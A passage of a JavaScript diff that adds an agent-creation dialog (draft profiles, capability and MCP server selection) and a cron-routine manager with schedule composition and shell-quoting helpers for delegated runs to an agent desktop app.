+  const [capsFailed, setCapsFailed] = useState(false)
+  const [dirtyCaps, setDirtyCaps] = useState({ skills: false, toolsets: false, mcp: false })
+  const [capFilter, setCapFilter] = useState('')
+  const [busy, setBusy] = useState(false)
+  const [error, setError] = useState(null)
+
+  const slug = slugify(name)
+  const valid = slug.length > 0 && NAME_RE.test(slug)
+  // Once the draft profile is materialized (Capabilities tab / MCP setup) it
+  // shows up in the roster — its OWN slug must not read as "taken".
+  const taken = roster.some(b => b.name === slug && b.name !== createdRef.current)
+
+  // Draft semantics for the lazily-created profile: opening the Capabilities
+  // tab (or running MCP setup) materializes the profile so the LIVE config
+  // surfaces have a real backend to write to — but until the user hits
+  // Create Agent it is a DRAFT. Cancelling the dialog deletes it, so
+  // preconfigure-then-back-out leaves zero residue. Best-effort and
+  // fire-and-forget: a failed cleanup surfaces a toast, never blocks close.
+  const discardDraft = () => {
+    const draft = createdRef.current
+
+    if (!draft) {
+      return
+    }
+
+    createdRef.current = null
+    flightRef.current = null
+    void deleteBot({ name: draft })
+      .then(() => host.notify({ kind: 'success', message: `Draft agent "${draft}" discarded` }))
+      .catch(err => host.notifyError(err, `Could not clean up draft profile "${draft}"`))
+  }
+
+  const reset = () => {
+    setName('')
+    setTitle('')
+    setDescription('')
+    setShape('circle')
+    setColor(AVATAR_COLORS[3])
+    setImage(null)
+    setAdvanced(false)
+    // Same default as the initial useState — resetting to '__none__' made
+    // the second agent you create silently start from a fresh profile
+    // instead of cloning the main one like the first dialog open did.
+    setCloneFrom('default')
+    setModel('')
+    setProvider('')
+    setSoul('')
+    setNoSkills(false)
+    setShareAuth(true)
+    setAdvTab('general')
+    setCreatedForCaps(null)
+    setCaps(null)
+    setCapsFailed(false)
+    setDirtyCaps({ skills: false, toolsets: false, mcp: false })
+    setCapFilter('')
+    setBusy(false)
+    setError(null)
+    createdRef.current = null
+    flightRef.current = null
+  }
+
+  // Capability catalog for the tabs: the profile doesn't exist yet, so show
+  // what it WILL have — the clone source's catalog, else the main profile's.
+  const capSource = cloneFrom === '__none__' ? 'default' : cloneFrom
+  const ensureCaps = () => {
+    if ((caps && caps.source === capSource) || capsFailed) {
+      return
+    }
+
+    Promise.all([
+      host.request('profiles.describe', { name: capSource }),
+      host.request('mcp.catalog', {}).catch(() => null)
+    ])
+      .then(([res, cat]) => {
+        // Full MCP menu = the profile's configured servers + the bundled
+        // catalog (installable). Configured entries win on name clash.
+        const configured = res.mcp_servers || []
+        const have = new Set(configured.map(m => m.name))
+        const catalog = ((cat && cat.servers) || []).filter(s => !have.has(s.name))
+
+        setCaps({
+          source: capSource,
+          skills: res.skills || [],
+          toolsets: res.toolsets || [],
+          mcp: [
+            ...configured,
+            ...catalog.map(s => ({
+              name: s.name,
+              enabled: false,
+              fromCatalog: true,
+              installed: s.installed,
+              auth: s.auth,
+              requires: s.requires || [],
+              description: s.description || ''
+            }))
+          ]
+        })
+      })
+      .catch(() => setCapsFailed(true))
+  }
+
+  const toggleCap = (kind, name, enabled) => {
+    setDirtyCaps(prev => ({ ...prev, [kind === 'mcp' ? 'mcp' : kind]: true }))
+    setCaps(prev =>
+      prev
+        ? { ...prev, [kind]: prev[kind].map(x => (x.name === name ? { ...x, enabled } : x)) }
+        : prev
+    )
+  }
+
+  // Materialize the profile exactly once. createdRef stores the finished slug
+  // (its consumers — the taken check, draft discard on cancel, the MCP setup
+  // button's profile param — all read a string); flightRef shares the
+  // in-flight creation promise so simultaneous MCP setup / Create clicks fire
+  // ONE profiles.create. A settled flight clears its slot: failures retry,
+  // and a null result (form invalid at flight time) isn't sticky.
+  const ensureAgentCreated = () => {
+    // Renamed since the draft materialized? The old draft is orphaned —
+    // discard it and create fresh under the new slug.
+    if (createdRef.current && createdRef.current !== slug) {
+      discardDraft()
+      setCreatedForCaps(null)
+    }
+
+    if (createdRef.current) {
+      return Promise.resolve(createdRef.current)
+    }
+
+    const flight = singleFlight(flightRef, async () => {
+      if (!valid || taken) {
+        return null
+      }
+
+      const descriptionText = [title, description].filter(Boolean).join(' — ')
+
+      await host.request('profiles.create', {
+        name: slug,
+        description: descriptionText,
+        clone_from: cloneFrom === '__none__' ? null : cloneFrom,
+        no_skills: noSkills,
+        // Shared (not copied) auth keeps ONE OAuth/token pool with the main
+        // profile, so refreshes can't invalidate each other. Older gateways
+        // ignore the param and copy — still functional, just forked.
+        share_auth: shareAuth,
+        soul: composeSoul({ name: slug, title, description, roster, customSoul: soul }),
+        ...(model.trim() && provider.trim() ? { model: model.trim(), provider: provider.trim() } : {})
+      })
+
+      createdRef.current = slug
+
+      // Apply capability picks from the Advanced tabs (best-effort; the
+      // profile exists either way and Edit Profile can finish the job).
+      try {
+        const capPayload = {}
+
+        if (dirtyCaps.skills && caps) {
+          capPayload.disabled_skills = caps.skills.filter(s => !s.enabled).map(s => s.name)
+        }
+        if (dirtyCaps.toolsets && caps) {
+          const en = caps.toolsets.filter(t => t.enabled)
+          capPayload.enabled_toolsets =
+            en.length === caps.toolsets.length || en.length === 0 ? [] : en.map(t => t.name)
+        }
+        if (dirtyCaps.mcp && caps) {
+          capPayload.enabled_mcp_servers = caps.mcp.filter(m => m.enabled).map(m => m.name)
+        }
+        if (Object.keys(capPayload).length) {
+          await host.request('profiles.configure', { name: slug, ...capPayload })
+        }
+      } catch {
+        /* capability application is best-effort */
+      }
+
+      saveBotMeta(slug, { shape, color, image, imageKind: image ? 'photo' : 'shape', title: title.trim(), created: Date.now() })
+      queryClient.invalidateQueries({ queryKey: ROSTER_KEY })
+      return slug
+    })
+
+    return flight
+  }
+
+  const submit = async () => {
+    if (!valid || taken || busy) {
+      return
+    }
+
+    setBusy(true)
+    setError(null)
+
+    try {
+      const slugCreated = await ensureAgentCreated()
+      if (!slugCreated) {
+        setBusy(false)
+        setError('Could not create the agent.')
+        return
+      }
+
+      host.notify({ kind: 'success', message: `Agent "${displayName({ name: slug, title })}" created` })
+      reset()
+      onClose()
+      $selectedBot.set(slug)
+
+      // Birth the bot's forever chat right away: it introduces itself as
+      // the first thing the user sees, and the pin exists from minute one.
+      try {
+        // Creates, pins, opens, and kicks off the intro in one flow.
+        const sid = await createCanonicalChat(slug)
+
+        if (!sid && typeof host.newChat === 'function') {
+          host.newChat(slug)
+        }
+      } catch {
+        if (typeof host.newChat === 'function') {
+          host.newChat(slug)
+        }
+      }
+    } catch (err) {
+      setBusy(false)
+      setError(err instanceof Error ? err.message : String(err))
+    }
+  }
+
+  return jsx(Dialog, {
+    open,
+    onOpenChange: value => {
+      if (!value && !busy) {
+        // Cancel path (esc / overlay click): a materialized draft profile is
+        // discarded — preconfigure-then-back-out leaves nothing behind.
+        discardDraft()
+        reset()
+        onClose()
+      }
+    },
+    children: jsxs(DialogContent, {
+      className: advanced ? 'max-w-3xl' : 'max-w-md',
+      // Native resize handle (bottom-right corner): the dialog becomes a
+      // window the user can grow/shrink. overflow:auto is required for CSS
+      // resize to engage; caps keep it on screen.
+      style: advanced
+        ? { resize: 'both', overflow: 'auto', minWidth: 420, minHeight: 360, maxWidth: '95vw', maxHeight: '90vh' }
+        : undefined,
+      children: [
+        jsxs(DialogHeader, {
+          children: [
+            jsx(DialogTitle, { children: 'New Agent' }),
+            jsx(DialogDescription, {
+              children: 'A named teammate with its own memory, skills, and chat. It can message your other agents.'
+            })
+          ]
+        }),
+        jsxs('div', {
+          className: 'grid gap-3.5',
+          children: [
+            jsx('div', {
+              className: 'flex justify-center py-1',
+              children: jsx(BotFace, { shape, color, image, size: 56, name: slug || 'agent' })
+            }),
+            jsx(AvatarPicker, {
+              shape,
+              color,
+              image,
+              onShape: setShape,
+              onColor: setColor,
+              onImage: setImage,
+              generateSeed: { name: slug || 'agent', title, description }
+            }),
+            labeled(
+              'Name',
+              jsx(Input, {
+                autoFocus: true,
+                placeholder: 'inbox-triage',
+                value: name,
+                onChange: event => setName(event.target.value)
+              })
+            ),
+            taken
+              ? jsx('div', {
+                  className: 'text-xs text-(--ui-accent)',
+                  children: `An agent named "${slug}" already exists.`
+                })
+              : null,
+            labeled(
+              'Title',
+              jsx(Input, {
+                placeholder: 'Inbox Triage',
+                value: title,
+                onChange: event => setTitle(event.target.value)
+              })
+            ),
+            labeled(
+              'Description',
+              jsx(Textarea, {
+                className: 'min-h-16',
+                placeholder: 'What should this Bot help with?',
+                value: description,
+                onChange: event => setDescription(event.target.value)
+              })
+            ),
+            jsxs('button', {
+              type: 'button',
+              className:
+                'flex items-center gap-1 text-xs font-medium text-(--ui-text-tertiary) hover:text-(--ui-text-secondary)',
+              onClick: () => {
+                setAdvanced(v => {
+                  if (!v) {
+                    ensureCaps()
+                  }
+                  return !v
+                })
+              },
+              children: [
+                jsx(Codicon, { name: advanced ? 'chevron-down' : 'chevron-right', className: 'text-[0.8rem]' }),
+                'Advanced'
+              ]
+            }),
+            advanced
+              ? jsxs('div', {
+                  className: 'grid gap-3 rounded-md border border-(--ui-stroke-secondary) p-3',
+                  children: [
+                    jsx('div', {
+                      className: 'flex gap-1',
+                      // Newer desktops export the whole Capabilities surface —
+                      // one live tab replaces the three staged checklists.
+                      children: (SkillsView
+                        ? [
+                            ['general', 'General'],
+                            ['capabilities', 'Capabilities']
+                          ]
+                        : [
+                            ['general', 'General'],
+                            ['skills', 'Skills'],
+                            ['toolsets', 'Tools'],
+                            ['mcp', 'MCP']
+                          ]
+                      ).map(([id, label]) =>
+                        jsx(
+                          'button',
+                          {
+                            type: 'button',
+                            className: cn(
+                              'rounded-md px-2.5 py-1 text-xs font-medium transition-colors',
+                              advTab === id
+                                ? 'bg-(--chrome-action-hover) text-(--ui-text-primary)'
+                                : 'text-(--ui-text-tertiary) hover:text-(--ui-text-secondary)'
+                            ),
+                            onClick: () => {
+                              setAdvTab(id)
+                              setCapFilter('')
+                              if (id === 'capabilities') {
+                                // The live surface needs a real profile —
+                                // materialize it now (same lazy-create door
+                                // the MCP setup buttons use).
+                                void ensureAgentCreated()
+                                  .then(created => created && setCreatedForCaps(created))
+                                  .catch(err => host.notifyError(err, 'Could not create the profile yet'))
+                              } else if (id !== 'general') {
+                                ensureCaps()
+                              }
+                            },
+                            children: label
+                          },
+                          id
+                        )
+                      )
+                    }),
+                    advTab === 'general'
+                      ? jsxs('div', {
+                          className: 'grid gap-3.5',
+                          children: [
+                            labeled(
+                              'Clone from profile',
+                              jsxs(Select, {
+                                value: cloneFrom,
+                                onValueChange: value => {
+                                  setCloneFrom(value)
+                                  setCaps(null)
+                                  setCapsFailed(false)
+                                },
+                                children: [
+                                  jsx(SelectTrigger, {
+                                    className: 'h-8 rounded-md',
+                                    children: jsx(SelectValue, {})
+                                  }),
+                                  jsxs(SelectContent, {
+                                    children: [
+                                      jsx(SelectItem, {
+                                        value: '__none__',
+                                        children: 'Fresh profile (bundled skills)'
+                                      }),
+                                      ...roster.map(b => jsx(SelectItem, { value: b.name, children: b.name }, b.name))
+                                    ]
+                                  })
+                                ]
+                              })
+                            ),
+                            jsx(ModelPicker, {
+                              value: { provider, model },
+                              onChange: patch => {
+                                if ('provider' in patch) {
+                                  setProvider(patch.provider)
+                                }
+                                if ('model' in patch) {
+                                  setModel(patch.model)
+                                }
+                              },
+                              placeholderModel: 'inherited from launch profile'
+                            }),
+                            labeled(
+                              'SOUL.md (optional — replaces the generated persona)',
+                              jsx(Textarea, {
+                                className: 'min-h-24 font-mono text-xs leading-5',
+                                placeholder:
+                                  'Leave blank to auto-generate from name/title/description + agent-messaging roster.',
+                                value: soul,
+                                onChange: event => setSoul(event.target.value)
+                              })
+                            ),
+                            jsxs('label', {
+                              className: 'flex items-center gap-2 text-xs text-(--ui-text-secondary)',
+                              children: [
+                                jsx(Checkbox, {
+                                  checked: shareAuth,
+                                  onCheckedChange: value => setShareAuth(Boolean(value))
+                                }),
+                                'Share keys & accounts with the main profile'
+                              ]
+                            }),
+                            jsx('div', {
+                              className: 'pl-6 pt-0.5 text-[0.7rem] leading-5 text-(--ui-text-tertiary)',
+                              children:
+                                'Subscriptions, OAuth logins, and API keys stay shared (not copied), so token refreshes never invalidate each other. Uncheck for an isolated snapshot copy.'
+                            }),
+                            jsxs('label', {
+                              className: 'flex items-center gap-2 text-xs text-(--ui-text-secondary)',
+                              children: [
+                                jsx(Checkbox, {
+                                  checked: noSkills,
+                                  onCheckedChange: value => setNoSkills(Boolean(value))
+                                }),
+                                'Create empty (skip bundled skills)'
+                              ]
+                            })
+                          ]
+                        })
+                      : advTab === 'capabilities'
+                        ? !valid || taken
+                          ? jsx('div', {
+                              className: 'px-2 py-3 text-center text-xs text-(--ui-text-tertiary)',
+                              children: taken
+                                ? 'That name is taken — pick another before configuring capabilities.'
+                                : 'Name the agent first — a draft profile is created when you open this tab (discarded if you cancel).'
+                            })
+                          : !createdForCaps
+                            ? jsx('div', {
+                                className: 'flex justify-center py-4',
+                                children: jsx(GlyphSpinner, {
+                                  spinner: 'breathe',
+                                  className: 'text-(--ui-text-tertiary)'
+                                })
+                              })
+                            : jsx('div', {
+                                className: 'overflow-hidden rounded-md border border-(--ui-stroke-secondary)',
+                                style: { height: 440, minHeight: 280, resize: 'vertical', overflow: 'auto' },
+                                // The REAL core Capabilities surface (skills +
+                                // one-click hub installs + tools + MCP), pinned
+                                // to the just-created profile. Writes land
+                                // immediately — no staging needed.
+                                children: jsx(SkillsView, { embedded: true, fixedProfile: createdForCaps })
+                              })
+                      : capsFailed
+                        ? jsx('div', {
+                            className: 'px-2 py-3 text-center text-xs text-(--ui-text-tertiary)',
+                            children:
+                              'Capability catalog needs a newer gateway (restart it after updating Hermes).'
+                          })
+                        : !caps
+                          ? jsx('div', {
+                              className: 'flex justify-center py-4',
+                              children: jsx(GlyphSpinner, {
+                                spinner: 'breathe',
+                                className: 'text-(--ui-text-tertiary)'
+                              })
+                            })
+                          : advTab === 'skills'
+                            ? noSkills
+                              ? jsx('div', {
+                                  className: 'px-2 py-3 text-center text-xs text-(--ui-text-tertiary)',
+                                  children: '“Create empty” is checked — no bundled skills will be installed.'
+                                })
+                              : jsxs('div', {
+                                  className: 'grid gap-1.5',
+                                  children: [
+                                    jsx(Input, {
+                                      className: 'h-7 text-xs',
+                                      placeholder: 'Filter skills…',
+                                      value: capFilter,
+                                      onChange: event => setCapFilter(event.target.value)
+                                    }),
+                                    jsx(ScrollArea, {
+                                      className: 'hermes-scroll-cap',
+                                      style: { maxHeight: 200 },
+                                      children: jsx(CheckList, {
+                                        items: capFilter.trim()
+                                          ? caps.skills.filter(s =>
+                                              s.name.toLowerCase().includes(capFilter.trim().toLowerCase())
+                                            )
+                                          : caps.skills,
+                                        onToggle: (name, enabled) => toggleCap('skills', name, enabled),
+                                        columns: 2
+                                      })
+                                    }),
+                                    jsx('div', {
+                                      className: 'text-[0.65rem] leading-4 text-(--ui-text-quaternary)',
+                                      children: `Catalog from ${caps.source} — unchecked skills are disabled after creation.`
+                                    }),
+                                    jsx(HubSkillsSection, {
+                                      forProfile: null,
+                                      onInstalled: name =>
+                                        setCaps(prev =>
+                                          !prev || prev.skills.some(s => s.name === name)
+                                            ? prev
+                                            : { ...prev, skills: [...prev.skills, { name, enabled: true }] }
+                                        )
+                                    })
+                                  ]
+                                })
+                            : advTab === 'toolsets'
+                              ? jsxs('div', {
+                                  className: 'grid gap-1.5',
+                                  children: [
+                                    jsx(ScrollArea, {
+                                      className: 'hermes-scroll-cap',
+                                      style: { maxHeight: 200 },
+                                      children: jsx(CheckList, {
+                                        items: caps.toolsets,
+                                        onToggle: (name, enabled) => toggleCap('toolsets', name, enabled),
+                                        columns: 2
+                                      })
+                                    }),
+                                    jsx('div', {
+                                      className: 'text-[0.65rem] leading-4 text-(--ui-text-quaternary)',
+                                      children: 'Leaving all (or none) checked keeps the default toolset behavior.'
+                                    })
+                                  ]
+                                })
+                              : caps.mcp.length === 0
+                                ? jsx('div', {
+                                    className: 'px-2 py-3 text-center text-xs text-(--ui-text-tertiary)',
+                                    children: 'No MCP servers configured or in the catalog.'
+                                  })
+                                : jsxs('div', {
+                                    className: 'grid gap-1.5',
+                                    children: [
+                                      jsx(ScrollArea, {
+                                        className: 'hermes-scroll-cap',
+                                        style: { maxHeight: 200 },
+                                        children: jsx('div', {
+                                          className: 'grid gap-1',
+                                          children: caps.mcp.map(m => {
+                                            const needsSetup =
+                                              m.fromCatalog && !m.installed && ((m.requires || []).length > 0 || (m.auth || '').toLowerCase() === 'oauth')
+
+                                            return jsxs(
+                                              'label',
+                                              {
+                                                className: 'flex items-start gap-2 text-xs text-(--ui-text-secondary)',
+                                                children: [
+                                                  jsx(Checkbox, {
+                                                    checked: !!m.enabled,
+                                                    disabled: needsSetup,
+                                                    onCheckedChange: value => toggleCap('mcp', m.name, Boolean(value))
+                                                  }),
+                                                  jsxs('span', {
+                                                    className: 'min-w-0',
+                                                    children: [
+                                                      jsx('span', { children: m.name }),
+                                                      m.fromCatalog && !needsSetup
+                                                        ? jsx('span', {
+                                                            className: 'ml-1.5 text-[0.65rem] text-(--ui-text-quaternary)',
+                                                            children: m.installed
+                                                              ? 'catalog · installed'
+                                                              : 'catalog'
+                                                          })
+                                                        : null,
+                                                      needsSetup
+                                                        ? jsx(McpSetupButton, {
+                                                            profile: createdRef.current,
+                                                            entry: m,
+                                                            ensureProfile: ensureAgentCreated,
+                                                            onDone: () => {
+                                                              // Setup done: mark installed so the row's
+                                                              // checkbox un-disables, and enable it.
+                                                              setCaps(prev =>
+                                                                prev
+                                                                  ? {
+                                                                      ...prev,
+                                                                      mcp: prev.mcp.map(x =>
+                                                                        x.name === m.name
+                                                                          ? { ...x, installed: true, enabled: true }
+                                                                          : x
+                                                                      )
+                                                                    }
+                                                                  : prev
+                                                              )
+                                                              setDirtyCaps(prev => ({ ...prev, mcp: true }))
+                                                            }
+                                                          })
+                                                        : null,
+                                                      m.description
+                                                        ? jsx('div', {
+                                                            className:
+                                                              'truncate text-[0.65rem] leading-4 text-(--ui-text-quaternary)',
+                                                            children: m.description
+                                                          })
+                                                        : null
+                                                    ]
+                                                  })
+                                                ]
+                                              },
+                                              m.name
+                                            )
+                                          })
+                                        })
+                                      }),
+                                      jsx('div', {
+                                        className: 'text-[0.65rem] leading-4 text-(--ui-text-quaternary)',
+                                        children:
+                                          'Configured servers copy from the main profile; catalog entries are the bundled MCP menu. Entries needing API keys route through setup first (credentials follow the shared keys setting).'
+                                      })
+                                    ]
+                                  })
+                  ]
+                })
+              : null,
+            error
+              ? jsx('div', {
+                  className: 'rounded-md border border-(--ui-stroke-secondary) px-3 py-2 text-xs text-(--ui-accent)',
+                  children: error
+                })
+              : null
+          ]
+        }),
+        jsxs(DialogFooter, {
+          children: [
+            jsx(Button, {
+              variant: 'ghost',
+              disabled: busy,
+              onClick: () => {
+                discardDraft()
+                reset()
+                onClose()
+              },
+              children: 'Cancel'
+            }),
+            jsx(Button, {
+              disabled: busy || !valid || taken,
+              onClick: submit,
+              children: busy ? 'Creating…' : 'Create Agent'
+            })
+          ]
+        })
+      ]
+    })
+  })
+}
+
+// ── routines (cron) ──────────────────────────────────────────────────────────
+//
+// Jobs are namespaced "[bot:<name>] <routine>". A job running in the active
+// bot profile uses the plain instruction; a different profile keeps the
+// hermes -p <bot> chat delegation wrapper so the run reaches that bot's
+// history. The tile follows the bot you're chatting with (gateway profile).
+const BOT_TAG_RE = /^\[bot:([a-z0-9][a-z0-9_-]*)\]\s*/i
+const SAFE_ROUTINE_MARKER = '[bot-mode:routine:v2] '
+const LEGACY_DELEGATED_ROUTINE_PREFIX = 'You are running the scheduled routine "'
+
+function routineBot(job) {
+  const match = BOT_TAG_RE.exec(job?.name || '')
+  return match ? match[1].toLowerCase() : null
+}
+
+function routineTitle(job) {
+  return (job?.name || '').replace(BOT_TAG_RE, '') || 'Untitled cronjob'
+}
+
+function isLegacyDelegatedRoutine(job) {
+  const preview = typeof job?.prompt_preview === 'string' ? job.prompt_preview : job?.prompt
+  return Boolean(routineBot(job) && typeof preview === 'string' && preview.startsWith(LEGACY_DELEGATED_ROUTINE_PREFIX))
+}
+
+async function loadRoutines(profile) {
+  // profile scopes cron.manage to that bot's own cron store (core RPC gained an
+  // optional `profile` param). Older gateways ignore the unknown param and
+  // return the launch-profile store — the [bot:] tag filter in selectRoutineJobs
+  // remains the graceful fallback there.
+  const scope = profile ? { profile } : {}
+  const data = await host.request('cron.manage', { action: 'list', include_disabled: true, ...scope })
+  const jobs = Array.isArray(data?.jobs) ? data.jobs : []
+  const activeLegacyJobs = jobs.filter(
+    job => isLegacyDelegatedRoutine(job) && job.enabled !== false && job.state !== 'paused'
+  )
+
+  // A pause failing must not fail the LIST — the pane would report "could
+  // not load cronjobs" over data that loaded fine, and the 20s poll would
+  // re-attempt the failing pause inside a failing query forever. Each pause
+  // swallows its own error; the overlay only claims jobs the gateway
+  // actually paused, and the next poll retries the rest.
+  const pauses = await Promise.all(
+    activeLegacyJobs.map(job =>
+      host
+        .request('cron.manage', { action: 'pause', name: job.job_id, ...scope })
+        .then(() => true)
+        .catch(() => false)
+    )
+  )
+
+  if (!activeLegacyJobs.length) {
+    return data
+  }
+
+  const pausedIds = new Set(activeLegacyJobs.filter((job, index) => pauses[index]).map(job => job.job_id))
+  return {
+    ...data,
+    jobs: jobs.map(job => (pausedIds.has(job.job_id) ? { ...job, enabled: false, state: 'paused' } : job))
+  }
+}
+
+function useRoutines(profile) {
+  return useQuery({
+    queryKey: [...ROUTINES_KEY, profile || ''],
+    queryFn: () => loadRoutines(profile),
+    refetchInterval: 20000,
+    staleTime: 8000
+  })
+}
+
+function routineCreateTarget(owner, activeBot) {
+  return owner || activeBot
+}
+
+async function invalidateRoutineOwner(profile) {
+  await queryClient.invalidateQueries({
+    queryKey: [...ROUTINES_KEY, profile || ''],
+    exact: true
+  })
+}
+
+/** Pick which cron jobs to show. A failed refresh keeps the last good list. */
+function selectRoutineJobs(data, error, lastJobs, bot) {
+  const live = Array.isArray(data?.jobs) ? data.jobs : null
+  const all = live ?? (error ? lastJobs : [])
+  return {
+    live,
+    all,
+    jobs: all.filter(job => routineBot(job) === bot)
+  }
+}
+
+function normalizedProfileName(profile) {
+  return typeof profile === 'string' ? profile.trim().toLowerCase() : ''
+}
+
+function shellQuote(value) {
+  return `'${String(value).replaceAll("'", "'\"'\"'")}'`
+}
+
+/** Escape for interpolation INSIDE an existing double-quoted shell string:
+ *  keeps ", `, $, and \ literal so free-text titles (which sync from ui_meta)
+ *  and gateway profile names can't expand or break out of the quotes. */
+function shellDoubleQuote(value) {
+  return String(value).replace(/[\\"`$]/g, ch => '\\' + ch)
+}
+
+function routineInputError(title, instruction) {
+  if (String(title).includes('\0')) {
+    return 'Cronjob name cannot contain NUL (U+0000).'
+  }
+
+  if (String(instruction).includes('\0')) {
+    return 'Cronjob instruction cannot contain NUL (U+0000).'
+  }
+
+  return null
+}
+
+function routinePrompt(bot, title, instruction, activeProfile) {
+  if (normalizedProfileName(bot) && normalizedProfileName(bot) === normalizedProfileName(activeProfile)) {
+    return instruction
+  }
+
+  return (
+    `${SAFE_ROUTINE_MARKER}You are running the scheduled routine "${title}" for agent '${bot}'. ` +
+    `Execute it AS that agent so the run lands in its own history: run this in the terminal and relay the output:\n\n` +
+    `hermes -p ${shellQuote(bot)} chat -c ${shellQuote(`Routine: ${title}`)} -q ${shellQuote(`[Scheduled routine] ${instruction}`)}\n\n` +
+    `If the command fails, report the error instead.`
+  )
+}
+function scheduleLabel(schedule) {
+  const once = /^once in (.+)$/.exec(schedule || '')
+
+  if (once) {
+    return `Once (${once[1]})`
+  }
+
+  const bare = /^(\d+)([mhd])$/.exec(schedule || '')
+
+  if (bare) {
+    return `Once (${bare[1]}${bare[2]})`
+  }
+
+  const match = /^every (\d+)m$/.exec(schedule || '')
+
+  if (match) {
+    const minutes = Number(match[1])
+
+    if (minutes % 1440 === 0) {
+      const d = minutes / 1440
+      return d === 1 ? 'Daily' : `Every ${d} days`
+    }
+
+    if (minutes % 60 === 0) {
+      const h = minutes / 60
+      return h === 1 ? 'Hourly' : `Every ${h}h`
+    }
+
+    return `Every ${minutes}m`
+  }
+
+  return schedule || ''
+}
+
+function RoutineRow({ job, profile }) {
+  const [busy, setBusy] = useState(false)
+  // Optimistic overlay: null = trust server state. Set immediately on
+  // toggle so the switch responds even before the refetch lands.
+  const [pendingActive, setPendingActive] = useState(null)
+  const legacyUnsafe = isLegacyDelegatedRoutine(job)
+  const serverActive = !legacyUnsafe && job.enabled !== false && job.state !== 'paused'
+  const active = pendingActive === null ? serverActive : pendingActive
+
+  if (pendingActive !== null && pendingActive === serverActive) {
+    setPendingActive(null) // server caught up
+  }
+
+  const act = async action => {
+    if (busy) {
+      return
+    }
+
+    setBusy(true)
+
+    if (action === 'pause' || action === 'resume') {
+      setPendingActive(action === 'resume')
+    }
+
+    try {
+      await host.request('cron.manage', { action, name: job.job_id, ...(profile ? { profile } : {}) })
+      await invalidateRoutineOwner(profile)
+    } catch (err) {
+      setPendingActive(null)
+      host.notifyError(err, 'Cronjob update failed')
+    } finally {
+      setBusy(false)
+    }
+  }
+
+  return jsxs('div', {
+    className: cn(
+      'group grid gap-1.5 rounded-lg border border-(--ui-stroke-secondary) p-2.5 transition-colors',
+      'hover:border-(--ui-stroke-primary, var(--ui-stroke-secondary))'
+    ),
+    children: [
+      jsxs('div', {
+        className: 'flex items-center gap-2',
+        children: [
+          jsx('span', {
+            'aria-hidden': true,
+            className: cn('size-1.5 shrink-0 rounded-full', active ? 'bg-emerald-500' : 'bg-(--ui-text-quaternary)')
+          }),
+          jsx('span', {
+            className: cn('min-w-0 flex-1 truncate text-xs font-medium', !active && 'text-(--ui-text-tertiary)'),
+            children: routineTitle(job)
+          }),
+          jsx(Switch, {
+            checked: active,
+            disabled: busy || legacyUnsafe,
+            onCheckedChange: value => act(value ? 'resume' : 'pause')
+          }),
+          jsx(Tip, {
+            label: 'Delete cronjob',
+            children: jsx('button', {
+              type: 'button',
+              disabled: busy,
+              className:
+                'flex size-5 items-center justify-center rounded text-(--ui-text-quaternary) opacity-0 transition-opacity group-hover:opacity-100 hover:bg-(--chrome-action-hover) hover:text-foreground',
+              onClick: () => act('remove'),
+              children: jsx(Codicon, { name: 'trash', className: 'text-[0.75rem]' })
+            })
+          })
+        ]
+      }),
+      jsxs('div', {
+        className: 'flex items-center justify-between gap-2 pl-3.5',
+        children: [
+          jsxs('span', {
+            className:
+              'inline-flex items-center gap-1 rounded-full border border-(--ui-stroke-secondary) px-1.5 py-0.5 text-[0.65rem] text-(--ui-text-tertiary)',
+            children: [jsx(Codicon, { name: 'calendar', className: 'text-[0.7rem]' }), scheduleLabel(job.schedule)]
+          }),
+          jsx('span', {
+            className: 'truncate text-[0.65rem] text-(--ui-text-quaternary)',
+            children: active && job.next_run_at ? `next ${relativeTime(new Date(job.next_run_at).getTime())}` : 'paused'
+          })
+        ]
+      }),
+      legacyUnsafe
+        ? jsx('div', {
+            className:
+              'rounded-md border border-(--ui-stroke-secondary) px-2 py-1.5 text-[0.65rem] leading-4 text-(--ui-accent)',
+            children: 'Paused for security: delete and recreate this legacy cronjob before running it again.'
+          })
+        : null
+    ]
+  })
+}
+
+// Structured schedule picker: frequency first, then only the detail that
+// frequency needs (time of day, weekday, day of month, interval). Emits a
+// Hermes-native schedule string; Advanced exposes it raw.
+const FREQUENCIES = [
+  { id: 'once', label: 'Once, in\u2026' },
+  { id: 'hourly', label: 'Every hour' },
+  { id: 'daily', label: 'Every day' },
+  { id: 'weekdays', label: 'Weekdays' },
+  { id: 'weekly', label: 'Every week' },
+  { id: 'monthly', label: 'Every month' },
+  { id: 'interval', label: 'Interval' },
+  { id: 'advanced', label: 'Advanced\u2026' }
+]
+
+const WEEKDAYS = [
+  { id: '1', label: 'Monday' },
+  { id: '2', label: 'Tuesday' },
+  { id: '3', label: 'Wednesday' },
+  { id: '4', label: 'Thursday' },
+  { id: '5', label: 'Friday' },
+  { id: '6', label: 'Saturday' },
+  { id: '0', label: 'Sunday' }
+]
+
+const TIMES = (() => {
+  const out = []
+  for (let h = 0; h < 24; h++) {
+    for (const m of [0, 30]) {
+      const ampm = h < 12 ? 'AM' : 'PM'
+      const h12 = h % 12 === 0 ? 12 : h % 12
+      out.push({ id: `${h}:${m}`, label: `${h12}:${String(m).padStart(2, '0')} ${ampm}`, h, m })
+    }
+  }
+  return out
+})()
+
+/** Compose the Hermes schedule string from picker state. */
+function composeSchedule(state) {
+  const [h, m] = (state.time || '9:0').split(':').map(Number)
+
+  switch (state.freq) {
+    case 'once': {
+      const n = Math.max(1, parseInt(state.onceN, 10) || 1)
+      return `${n}${state.onceUnit || 'h'}`
+    }
+    case 'hourly':
+      return 'every 1h'
+    case 'daily':
+      return `${m} ${h} * * *`
+    case 'weekdays':
+      return `${m} ${h} * * 1-5`
+    case 'weekly':
+      return `${m} ${h} * * ${state.weekday || '1'}`
+    case 'monthly':
+      return `${m} ${h} ${state.monthday || '1'} * *`
+    case 'interval': {
+      const n = Math.max(1, parseInt(state.intervalN, 10) || 1)
+      return `every ${n}${state.intervalUnit || 'h'}`
+    }
+    default:
+      return state.raw || ''
+  }
+}
+
+function scheduleSummary(state) {
+  const t = TIMES.find(x => x.id === state.time)
+  const tl = t ? t.label : '9:00 AM'
+
+  const unitWord = u => (u === 'm' ? 'minute(s)' : u === 'd' ? 'day(s)' : 'hour(s)')
+  const cap =
+    state.freq !== 'once' && String(state.repeatN || '').trim()
+      ? `, ${Math.max(1, parseInt(state.repeatN, 10) || 1)} time(s) total`
+      : ''
+
+  switch (state.freq) {
+    case 'once':
+      return `Runs once, ${Math.max(1, parseInt(state.onceN, 10) || 1)} ${unitWord(state.onceUnit)} from now`
+    case 'hourly':
+      return 'Runs at the top of every hour' + cap
+    case 'daily':
